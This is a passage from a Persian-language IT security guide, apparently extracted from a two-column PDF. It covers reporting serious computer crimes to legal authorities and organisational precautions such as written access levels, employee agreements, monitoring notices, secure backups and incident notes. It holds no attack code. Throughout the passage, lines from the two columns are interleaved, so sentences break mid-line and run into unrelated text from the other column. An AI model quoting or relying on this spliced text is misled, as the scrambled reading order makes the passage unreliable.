‫ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﺧﻮﺏ ﻓﻜﺮ ﻛﻨﻴﺪ ﻭ ﺟﻮﺍﻧﺐ ﺍﻣـﺮ ﺭﺍ ﻣـﻮﺭﺩ ﺑﺮﺭﺳـﻲ‬
‫ﺁﻭﺭﺩﻥ ﺁﺳﻴﺒﻬﺎﻱ ﺑﻴﺸﺘﺮ ﻭ ﺑﻪ ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﺑﺎﺯ ﻣﻲﮔـﺬﺍﺭﺩ‪ .‬ﺑـﻪ ﻳـﺎﺩ‬
‫ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﻗﻊ ﺑﻬﺘـﺮ ﺍﺳـﺖ ﺑـﺴﻨﺠﻴﺪ ﻛـﻪ ﺩﺭ ﭼـﻪ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻧﭽﻪ ﺷﻤﺎ ﺑﺎ ﺁﻥ ﺑﺮﺧﻮﺭﺩ ﻛﺮﺩﻩﺍﻳـﺪ‬
‫ﺻﻮﺭﺕ ﻣﺮﺍﺟﻌﻪ ﺑﻪ ﻣﺮﺍﺟﻊ ﻗﻀﺎﻳﻲ ﻻﺯﻡ ﺍﺳﺖ‪ :‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻭﺍﻗﻌﹰﺎ‬
‫ﺟﺰﺋــﻲ ﺍﺯ ﻳــﻚ ﻣﺠﻤﻮﻋــﺔ ﻋﻈــﻴﻢ ﺟــﺮﺍﺋﻢ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻭ ﺍﻋﻤــﺎﻝ‬
‫ﭼﻴــﺰﻱ ﺭﺍ ﺍﺯ ﺩﺳــﺖ ﺩﺍﺩﻩ ﻭ ﻣﺘﺤﻤــﻞ ﺿــﺮﺭ ﺷــﺪﻩﺍﻳــﺪ ﻭ ﻳــﺎ‬
‫ﺧﺮﺍﺑﻜﺎﺭﺍﻧﻪ ﺑﺎﺷﺪ‪ .‬ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﺑﺮﺭﺳﻴﻬﺎﻱ ﻻﺯﻡ ﻧﻤـﻲﺗـﻮﺍﻥ ﺍﺩﻋـﺎ‬
‫ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺷﺨﺼﹰﺎ ﻗﺎﺩﺭ ﺑﻪ ﻛﻨﺘﺮﻝ ﻭﺿﻌﻴﺖ ﭘﻴﺶﺁﻣﺪﻩ ﻧﻴـﺴﺘﻴﺪ‪.‬‬
‫ﻛﺮﺩ ﻛﻪ ﺁﻧﭽﻪ ﺑﺮ ﺳﺮ ﺷﻤﺎ ﺁﻣﺪﻩ ﻳﻚ ﺭﺧﺪﺍﺩ ﻣﺠﺰﺍ ﻭ ﺑﻲﺍﺭﺗﺒﺎﻁ ﺑـﺎ‬
‫ﺑﻌﻀﻲ ﺍﻭﻗﺎﺕ ﻫﻴﺎﻫﻮﻱ ﻧﺎﺷﻲ ﺍﺯ ﻳﻚ ﺍﺗﻔﺎﻕ ﺧﻄﺮﻧـﺎﻛﺘﺮ ﺍﺯ ﺳـﺎﻳﺮ‬
‫ﺳﺎﻳﺮ ﺍﺟﺰﺍﻱ ﺳﻴﺴﺘﻢ ﺑﻮﺩﻩ ﻭ ﻳﺎ ﺟﺰﺋﻲ ﺍﺯ ﻳﻚ ﺗﻬﺎﺟﻢ ﺑﺰﺭﮔﺘﺮ‪.‬‬
‫ﺧﺴﺎﺭﺗﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﭘﻲ ﻭﻗﻮﻉ ﺁﻥ ﺍﺗﻔﺎﻕ ﺑﻪ ﺑﺎﺭ ﻣﻲﺁﻳﺪ‪.‬‬
‫ﻞ ﺩﻳﮕ ﹺﺮ ﻋﺪﻡ ﮔﺰﺍﺭﺵ ﺟﺮﺍﺋﻢ ﺳﻨﮕﻴﻦ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻳـﻦ ﺍﺳـﺖ‬ ‫ﻣﺸﻜ ﹺ‬
‫ﺑﻌﺪ ﺍﺯ ﺍﻳﻨﻜﻪ ﺗﺼﻤﻴﻢ ﺑﻪ ﺍﺳﺘﻤﺪﺍﺩ ﺍﺯ ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﮔﺮﻓﺘﻴﺪ ﺍﺯ ﺑﻪﭘﺎ‬
‫ﻛﻪ ﺑﺮﺧﻲ ﺑﻪ ﻏﻠﻂ ﺗﺼﻮﺭ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ ﻛﻪ ﺍﻳﻦ ﺟﺮﺍﺋﻢ ﺑﻨﺪﺭﺕ ﺭﺥ‬
‫ﻛﺮﺩﻥ ﻫﻴﺎﻫﻮ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺑﭙﺮﻫﻴﺰﻳﺪ‪ .‬ﺩﺭ ﺑﻌﻀﻲ ﻣـﻮﺍﺭﺩ ﺩﺧﺎﻟـﺖ‬
‫ﻣــﻲﺩﻫﻨــﺪ ﻭ ﺩﺭﻧﺘﻴﺠــﻪ ﺍﺣﺘﻤــﺎﻝ ﻭﻗــﻮﻉ ﺍﻳــﻦ ﻣــﺸﻜﻼﺕ ﺩﺭ‬
‫ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﻣﻲ ﺗﻮﺍﻧﺪ ﻋﺎﻣﻞ ﺩﻟﺴﺮﺩﻱ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺑﺎﺷﺪ‪ ،‬ﺍﻣـﺎ ﺩﺭ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﻧﺎﭼﻴﺰ ﺧﻮﺍﻫﻨﺪ ﭘﻨﺪﺍﺷﺖ‪ ،‬ﺭﻭﻱ ﺑﻮﺩﺟﻪﺑﻨﺪﻱ ﻭ‬
‫ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ ﻧﻴـﺰ ﻣـﻲﺗﻮﺍﻧـﺪ ﺷـﻤﺎ ﺭﺍ ﺩﺭ ﻛـﺎﻧﻮﻥ ﺗﻮﺟـﻪ ﺁﻧﻬـﺎ ﻭ‬
‫ﺁﻣﻮﺯﺵ ﻣﺄﻣﻮﺭﺍﻥ ﺟﺪﻳﺪ ﺍﺟﺮﺍﻳﻲ ﺗﺄﻛﻴﺪ ﺯﻳﺎﺩﻱ ﺑﻌﻤﻞ ﻧﺨﻮﺍﻫﺪ ﺁﻣﺪ؛‬
‫ﺩﺭﻧﺘﻴﺠﻪ ﺣﻤﻼﺕ ﺑﻴﺸﺘﺮ ﻗﺮﺍﺭ ﺩﻫﺪ‪ .‬ﺁﮔﺎﻩ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫‪١٨٣‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﻧﺴﺨﺔ ﭼﺎﭘﻲ ﺗﻬﻴﻪ ﻭ ﺁﻧﻬﺎ ﺭﺍ ﺿﻤﻴﻤﺔ ﻳﺎﺩﺩﺍﺷﺘﻬﺎﻳﺘﺎﻥ ﻛﻨﻴﺪ‪.‬‬ ‫ﺑﺮﺍﻱ ﺑﻬﺒﻮﺩ ﻗﻮﺍﻧﻴﻦ ﻓﻌﻠﻲ ﺗﻼﺵ ﻧﺎﭼﻴﺰﻱ ﺧﻮﺍﻫﺪ ﺷـﺪ؛ ﻭ ﺟﺎﻣﻌـﻪ‬
‫ﻫﻨﮕﺎﻡ ﺍﻧﺠﺎﻡ ﺑﺎﺯﺭﺳﻴﻬﺎ ﻭ ﺗﺤﻘﻴﻘﺎﺕ‪ ،‬ﻭﺟـﻮﺩ ﻳـﻚ ﺳـﺎﺑﻘﺔ‬ ‫ﻧﻴﺰ ﺑﻪ ﻣﻮﺿﻮﻋﺎﺗﻲ ﺍﺯ ﺍﻳﻦ ﻗﺒﻴﻞ ﺗﻮﺟﻪ ﻛﻤﺘﺮﻱ ﻧﺸﺎﻥ ﺧﻮﺍﻫﺪ ﺩﺍﺩ؛‬
‫ﻛﺘﺒﻲ ﺍﺯ ﺍﺗﻔﺎﻗﺎﺗﻲ ﻛﻪ ﺭﺥ ﺩﺍﺩﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺑـﺴﻴﺎﺭ ﺍﺭﺯﺷـﻤﻨﺪ‬ ‫ﻭ ﺧﻼﺻﻪ ﺍﻳﻨﻜﻪ ﻧﺘﻴﺠﻪ ﺍﻳﻦ ﺧﻮﺍﻫﺪ ﺑـﻮﺩ ﻛـﻪ ﻣﺤـﻴﻂ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬
‫ﺑﺎﺷﺪ‪ .‬ﺯﻣﺎﻥ ﻭ ﻣﻮﺿﻮﻉ ﻛﻠﻴﺔ ﺗﻤﺎﺳﻬﺎ ﺑﺎ ﻣﺮﺍﺟﻊ ﻗـﺎﻧﻮﻧﻲ ﺭﺍ‬ ‫ﺑﺮﺍﻱ ﻫﻤﺔ ﺑﺎﺯﻳﮕﺮﺍﻥ ﺁﻥ ﺧﻄﺮﻧﺎﻛﺘﺮ ﺍﺯ ﺁﻧﭽﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑﻨﻈـﺮ‬
‫ﻧﻴﺰ ﺑﻪ ﺛﺒﺖ ﺑﺮﺳﺎﻧﻴﺪ‪.‬‬ ‫ﺑﻴﺎﻳﺪ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﺳﻌﻲ ﻛﻨﻴﺪ ﺳﻄﻮﺡ ﺍﺧﺘﻴﺎﺭﺍﺕ ﻛﻠﻴﺔ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ‬ ‫•‬
‫ﺍﺣﺘﻴﺎﻁ ﺑﻴﺸﺘﺮ‪...‬‬
‫ﺑﺼﻮﺭﺕ ﻛﺘﺒﻲ ﺗﻌﺮﻳﻒ ﻛﻨﻴﺪ ﻭ ﻫﺮﺁﻧﭽﻪ ﻛـﻪ ﻓـﺮﺩ ﺑـﻪ ﺁﻥ‬
‫ﺩﺳﺘﺮﺳﻲ ﻗﺎﻧﻮﻧﻲ ﺩﺍﺭﺩ )ﻭ ﻧﻴﺰ ﻫﺮﭼﻪ ﻛﻪ ﺑﻪ ﺁﻥ ﺩﺳﺘﺮﺳﻲ ﻧﺪﺍﺭﺩ(‬ ‫ﺩﺭ ﺍﻳﻦ ﺑﺨﺶ ﺧﻼﺻﻪﺍﻱ ﺍﺯ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ‬
‫ﺭﺍ ﺩﺭ ﺍﻳﻦ ﺗﻌﺎﺭﻳﻒ ﺑﻴﺎﻭﺭﻳﺪ‪ .‬ﺑﺮﺍﻱ ﺍﺑﻼﻍ ﺍﻳـﻦ ﺗﻌـﺎﺭﻳﻒ ﺑـﻪ‬ ‫ﺍﺯ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ ﺍﺣﺘﻤﺎﻟﻲ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ‪:‬‬
‫ﺍﻓﺮﺍﺩ ﺳﺎﺯ ﻭ ﻛﺎﺭﻱ ﺑﻴﺎﻧﺪﻳﺸﻴﺪ ﻛﻪ ﻫﺮ ﻛﺲ ﺑﺘﻮﺍﻧﺪ ﺑﺨـﻮﺑﻲ‬ ‫ﺩﺭ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ‬ ‫•‬
‫ﺁﻧﺮﺍ ﺑﻔﻬﻤﺪ ﻭ ﺑﻪ ﻛﺎﺭ ﺑﺒﻨـﺪﺩ‪ ،‬ﻭ ﻣﺤـﺪﻭﺩﻳﺘﻬﺎﻱ ﺣﺎﺻـﻞ ﺍﺯ‬ ‫ﺣﻖ ﻧـﺴﺨﻪ ﺑـﺮﺩﺍﺭﻱ ﻭ ﻣﺎﻟﻜﻴـﺖ ﺍﻧﺤـﺼﺎﺭﻱ ﺧـﻮﺩ ﺭﺍ ﺩﺭ‬
‫ﺁﻧﺮﺍ ﻧﻴﺰ ﺩﺭﻙ ﻛﻨﺪ‪.‬‬ ‫ﺍﺑﺘﺪﺍﻳﻲﺗﺮﻳﻦ ﺑﺨﺶ ﻫﺮﻳﻚ ﺍﺯ ﻓﺎﻳﻠﻬـﺎ ﻗـﺮﺍﺭ ﺩﻫﻴـﺪ‪ .‬ﺍﮔـﺮ‬
‫ﺑﻪ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺧﻮﺩ ﺻﺮﺍﺣﺘﹰﺎ ﮔﻮﺷﺰﺩ ﻛﻨﻴﺪ ﻛﻪ ﻣﻠﺰﻡ ﻫﺴﺘﻨﺪ‬ ‫•‬ ‫ﺻﺮﺍﺣﺘﹰﺎ ﺑﻪ ﺣﻖ ﻧﺴﺨﻪﺑـﺮﺩﺍﺭﻱ ﺍﺷـﺎﺭﻩ ﻛـﺮﺩﻩﺍﻳـﺪ‪ ،‬ﺣﺘﻤـﹰﺎ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﺩﺭ ﭘﺎﻳﺎﻥ ﻛﺎﺭﺷﺎﻥ ﻭ ﻳﺎ ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺍﺯ ﺁﻧﻬﺎ ﺧﻮﺍﺳﺘﻪ ﺷـﺪ‬ ‫ﺍﻣﻜﺎﻥ ﭘﺮﻛﺮﺩﻥ ﻳﻚ ﻓﺮﻡ ﻣﺨﺼﻮﺹ ﺩﺭ ﻫﻤﻴﻦ ﺭﺍﺑﻄـﻪ ﺭﺍ‬
‫ﻛﻠﻴﺔ ﻣﻨﺎﺑﻌﻲ ﻛﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭﺷﺎﻥ ﺑﻮﺩﻩ )ﻣﺜﻞ ﻣﺘﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻭ‬ ‫ﺑﺮﺍﻱ ﻫﺮ ﻣﺸﺘﺮﻱ ﭘﻴﺶﺑﻴﻨﻲ ﻛﻨﻴﺪ‪ .‬ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﺪ‬
‫ﻛﺘﺎﺑﭽﻪﻫﺎﻱ ﺭﺍﻫﻨﻤﺎ( ﺭﺍ ﺑﺎﺯﮔﺮﺩﺍﻧﻨﺪ‪.‬‬ ‫ﺑﻪ ﺑﺎﺯﺭﺳﻲ ﺩﻗﻴﻖﺗﺮ ﻭ ﺗﺮﻣﻴﻢ ﺧﺴﺎﺭﺗﻬﺎ ﻛﻤﻚ ﻛﻨﺪ‪.‬‬

‫ﺍﮔﺮ ﺍﺗﻔـﺎﻗﻲ ﺭﺥ ﺩﺍﺩﻩ ﻛـﻪ ﺑﻨﻈـﺮ ﺷـﻤﺎ ﺍﻧﺠـﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ‬ ‫•‬ ‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻـﻞ ﻛﻨﻴـﺪ ﻛـﻪ ﻛـﺎﺭﺑﺮﺍﻥ ﺩﺭﺑـﺎﺭﺓ ﺑﺎﻳـﺪﻫﺎ ﻭ‬ ‫•‬

‫ﭘﻠﻴــﺴﻲ ﺭﺍ ﻻﺯﻡ ﻣــﻲﻛﻨــﺪ‪ ،‬ﺍﺟــﺎﺯﻩ ﻧﺪﻫﻴــﺪ ﻛﺎﺭﻛﻨــﺎﻥ ﺑــﻪ‬ ‫ﻧﺒﺎﻳﺪﻫﺎﻱ ﻓﻌﺎﻟﻴﺘﻬﺎ ﻭ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺧﻮﺩ ﺁﮔﺎﻫﻲ ﻛﺎﻣﻞ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﺗﺤﻘﻴﻘــﺎﺕ ﺧﻮﺩﺳــﺮﺍﻧﻪ ﺑﭙﺮﺩﺍﺯﻧــﺪ‪ .‬ﺗﻼﺷــﻬﺎﻱ ﺧﻮﺩﺳــﺮﺍﻧﻪ‬ ‫ﺗﻤﺎﻡ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺍﺯ ﻫﺮ ﭼﻴﺰﻱ ﻛﻪ ﺩﺭ ﺷﺒﻜﺔ ﺷـﻤﺎ ﺗﺤـﺖ‬ ‫•‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺷﻮﻧﺪ ﺑﻌﻀﻲ ﻣﺪﺍﺭﻙ ﺩﺭ ﺑﺎﺯﺭﺳـﻴﻬﺎﻱ‬ ‫ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻣﻄﻠﻊ ﻛﻨﻴﺪ )ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺑـﺎ ﺍﻧﺠـﺎﻡ ﺍﻳﻨﻜـﺎﺭ‬
‫ﺭﺳﻤﻲ ﺳﻨﺪﻳﺖ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺑﺪﻫﻨﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜﻦ‬ ‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺷﻤﺎ ﻧﻘﺾ ﻧﻤﻲ ﺷﻮﺩ(‪ .‬ﺍﻳﻦ ﻧﻈﺎﺭﺕ ﻣﻲ ﺗﻮﺍﻧﺪ ﺷﺎﻣﻞ‬
‫ﺍﺳﺖ ﺑﺎﺯﺭﺳﺎﻥ ﺑﺎ ﻣـﺸﺎﻫﺪﺓ ﺩﺧﺎﻟـﺖ ﺷـﻤﺎ ﺩﺭ ﺗﺤﻘﻴﻘـﺎﺕ‪،‬‬ ‫ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﻓﺸﺮﺩﻩﺷﺪﻥ ﻛﻠﻴﺪﻫﺎ‪ ،‬ﻭ ﺩﺳﺘﺮﺳـﻲ‬
‫ﻧﺴﺒﺖ ﺑﻪ ﺷﻤﺎ ﺩﻳﺪ ﻣﻨﻔﻲ ﭘﻴﺪﺍ ﻛﻨﻨﺪ‪.‬‬ ‫ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﺷﻮﺩ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻦ ﻧﻈﺎﺭﺕ ﻫﺸﺪﺍﺭ ﺩﺍﺩﻩ‬
‫ﻛﺎﺭﻣﻨﺪﺍﻥ ﺧـﻮﺩ ﺭﺍ ﺑـﻪ ﺍﻣـﻀﺎﻱ ﺗﻮﺍﻓﻘﻨﺎﻣـﻪﺍﻱ ﺩﺭ ﺯﻣﻴﻨـﺔ‬ ‫•‬ ‫ﻧﺸﻮﺩ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﻈﺎﺭﺕ ﺑﺮ ﻛﺎﺭﻫﺎﻱ ﻳﻚ ﻣﻬﺎﺟﻢ ﻫـﻢ‬
‫ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻳــﺸﺎﻥ ﺩﺭ ﻗﺒــﺎﻝ ﺍﻃﻼﻋــﺎﺕ ﺣــﺴﺎﺱ‪ ،‬ﻛــﺎﺭﺑﺮﺩ‬ ‫ﺑﻌﻨﻮﺍﻥ ﻧﻘﺾ ﻗﻮﺍﻧﻴﻦ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺗﻠﻘﻲ ﺷﻮﺩ‪.‬‬
‫ﺭﺍﻳﺎﻧﻪ‪ ،‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ ﺩﻳﮕـﺮ ﻣـﺴﺎﺋﻞ‬ ‫ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺭﺍ ﺧـﻮﺏ ﺗﻬﻴـﻪ ﻛﻨﻴـﺪ ﻭ ﺍﺯ ﺁﻧﻬـﺎ ﺩﺭ‬ ‫•‬
‫ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑﻌـﺪﻫﺎ ﻣﻄـﺮﺡ ﺷـﻮﻧﺪ ﻣﻠـﺰﻡ‬ ‫ﺟﺎﻱ ﺍﻣﻨﻲ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ‪ .‬ﺍﮔـﺮ ﺑـﺮﺍﻱ ﻛـﺸﻒ ﺣﻘﻴﻘـﺖ‬
‫ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴـﺪ ﻛـﻪ ﺳﻴﺎﺳـﺘﻬﺎ ﺻـﺮﻳﺢ ﻭ‬ ‫ﻻﺯﻡ ﺍﺳﺖ ﺍﻳﻦ ﻧﺴﺨﻪﻫﺎ ﺭﺍ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻣﻮﺭﺩ ﻣﻘﺎﻳﺴﻪ ﻗﺮﺍﺭ‬
‫ﻋﺎﺩﻻﻧﻪ ﻫﺴﺘﻨﺪ ﻭ ﻫﻤﺔ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﺯ ﺁﻥ ﺁﮔـﺎﻫﻲ ﺩﺍﺭﻧـﺪ ﻭ‬ ‫ﺩﻫﻴﺪ ﺑﺎﻳﺪ ﻗﺎﺩﺭ ﺑﺎﺷﻴﺪ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﻪ ﻧﺴﺨﻪﻫﺎ ﺩﺳﺘﺮﺳـﻲ‬
‫ﻣﻮﺍﻓﻘﺘﻨﺎﻣﻪ ﻣﺮﺑﻮﻃﻪ ﺭﺍ ﺍﻣﻀﺎ ﻛﺮﺩﻩ ﺍﻧﺪ‪ .‬ﺗﺼﺮﻳﺢ ﻛﻨﻴـﺪ ﻛـﻪ‬ ‫ﺩﺍﺷﺘﻪﺍﻧﺪ ﺭﺍ ﻣﺸﺨﺺ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻧﮕﻬـﺪﺍﺭﻱ ﺍﺯ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎ ﺩﺭ‬
‫ﻛﻠﻴﺔ ﺩﺳﺘﺮﺳﻴﻬﺎ ﻭ ﺣﻘﻮﻕ ﺩﺳﺘﺮﺳﻲ ﻫﻨﮕﺎﻡ ﭘﺎﻳـﺎﻥﻳـﺎﻓﺘﻦ‬ ‫ﻣﺤﻴﻄﻬﺎﻱ ﻋﻤﻮﻣﻲ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺑﻌﺪﻫﺎ ﻧﺘـﻮﺍﻥ ﺍﺯ ﺁﻧﻬـﺎ‬
‫ﺩﻭﺭﺓ ﻛﺎﺭﻱ ﭘﺎﻳﺎﻥ ﻣﻲﻳﺎﺑﺪ ﻭ ﻫﺮﮔﻮﻧﻪ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠـﺎﺯ‬ ‫ﺑﻌﻨﻮﺍﻥ ﻣﺪﺭﻙ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬
‫ﺩﺭ ﺧﻼﻝ ﻳﺎ ﭘـﺲ ﺍﺯ ﭘﺎﻳـﺎﻥ ﺩﻭﺭﺓ ﻛـﺎﺭﻱ ﺗﺤـﺖ ﭘﻴﮕـﺮﺩ‬
‫ﺩﺭﺻﻮﺭﺕ ﻣﺸﺎﻫﺪﺓ ﻫﺮﮔﻮﻧﻪ ﻣﻮﺭﺩ ﻣﺸﻜﻮﻙ ﻳﺎ ﺍﺗﻔﺎﻗﻲ ﻛﻪ‬ ‫•‬
‫ﻗﺎﻧﻮﻧﻲ ﻗﺮﺍﺭ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ‪.‬‬
‫ﻧﻴﺎﺯ ﺑﻪ ﺩﺧﺎﻟﺖ ﻣﺮﺍﺟﻊ ﻗﻀﺎﻳﻲ ﺩﺍﺭﺩ‪ ،‬ﻳﺎﺩﺩﺍﺷـﺖﺑـﺮﺩﺍﺭﻱ ﺭﺍ‬
‫ﺷﺮﻭﻉ ﻛﻨﻴﺪ‪ .‬ﻣﺸﺎﻫﺪﺍﺕ ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺧﻮﺩ ﻭ ﺯﻣﺎﻥ ﻫﺮﻳﻚ‬
‫ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﻳﺎﺩﺩﺍﺷﺖ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﻭ ﺭﺩﮔﻴﺮﻱﻫﺎ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٨٤‬‬

‫ﺑﺎ ﻛﻤـﻚ ﻭﻛﻴـﻞ ﻭ ﺷـﺮﻛﺖ ﺑﻴﻤـﺔ ﺧـﻮﺩ ﺑـﺮﺍﻱ ﻛﺎﺭﻫـﺎ‪،‬‬ ‫•‬ ‫ﻣﺨﺎﻃﺮﺍﺕ ﺟﻨﺎﻳﻲ ﺩﺭ ﺣﻮﺯﺓ ﺗﺠﺎﺭﺕ‬
‫ﺗﺤﻘﻴﻘﺎﺕ ﻣﺮﺗﺒﻂ‪ ،‬ﻭ ﻫﺮ ﻓﻌﺎﻟﻴﺖ ﻣﺮﺑﻮﻁ ﻛﻪ ﺑﺎﻳـﺪ ﻫﻨﮕـﺎﻡ‬
‫ﺍﮔﺮ ﺷﻤﺎ ﻳﻚ ‪ ISP‬ﻫﺴﺘﻴﺪ ﻳﺎ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻭ ﻳﺎ ﺑﻪ ﻫﺮ ﺻﻮﺭﺗﻲ ﺩﺭ‬
‫ﻭﻗﻮﻉ ﻳﻚ ﻧﻔﻮﺫ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﺍﻗﺘﻀﺎﺋﻲ ﺗﺪﻭﻳﻦ‬
‫ﻣﺤﻞ ﻛﺎﺭ ﺧـﻮﺩ ﺷـﺒﻜﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﺍﺭﻳـﺪ‪ ،‬ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺍﺯ‬
‫ﻛﻨﻴﺪ‪.‬‬
‫ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺷﻤﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻧﺎﺩﺭﺳﺖ ﺷﻮﺩ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺧﻮﺩﺗـﺎﻥ‬
‫ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻣﺠﺮﻳﺎﻥ ﻗـﺎﻧﻮﻥ ﻛـﻪ ﺷﺎﻳـﺴﺘﮕﻲ ﺩﺍﺭﻧـﺪ ﺭﻭﻱ‬ ‫•‬ ‫ﺗﺤﺖ ﺗﻌﻘﻴﺐ ﻗﺎﻧﻮﻧﻲ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﺪ‪.‬‬
‫ﻣﺸﻜﻼﺕ ﺑﺎﻟﻘﻮﻩ ﺗﺤﻘﻴﻖ ﻛﻨﻨﺪ ﺭﺍ ﻣـﻮﺭﺩ ﺷﻨﺎﺳـﺎﻳﻲ ﻗـﺮﺍﺭ‬
‫ﺍﮔﺮ ﻣﻘﺎﻣﺎﺕ ﻗﻀﺎﻳﻲ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺑﺮﺳﻨﺪ ﻛﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺷـﻤﺎ‬
‫ﺩﻫﻴﺪ؛ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺍﻳﺸﺎﻥ ﻣﻌﺮﻓﻲ ﻛﻨﻴﺪ‪ ،‬ﻭ ﻧﮕﺮﺍﻧﻴﻬﺎﻳﺘـﺎﻥ ﺭﺍ‬
‫ﺗﻮﺳﻂ ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺩﻳﮕـﺮ‪ ،‬ﺍﻧﺘﻘـﺎﻝ ﻭ‬
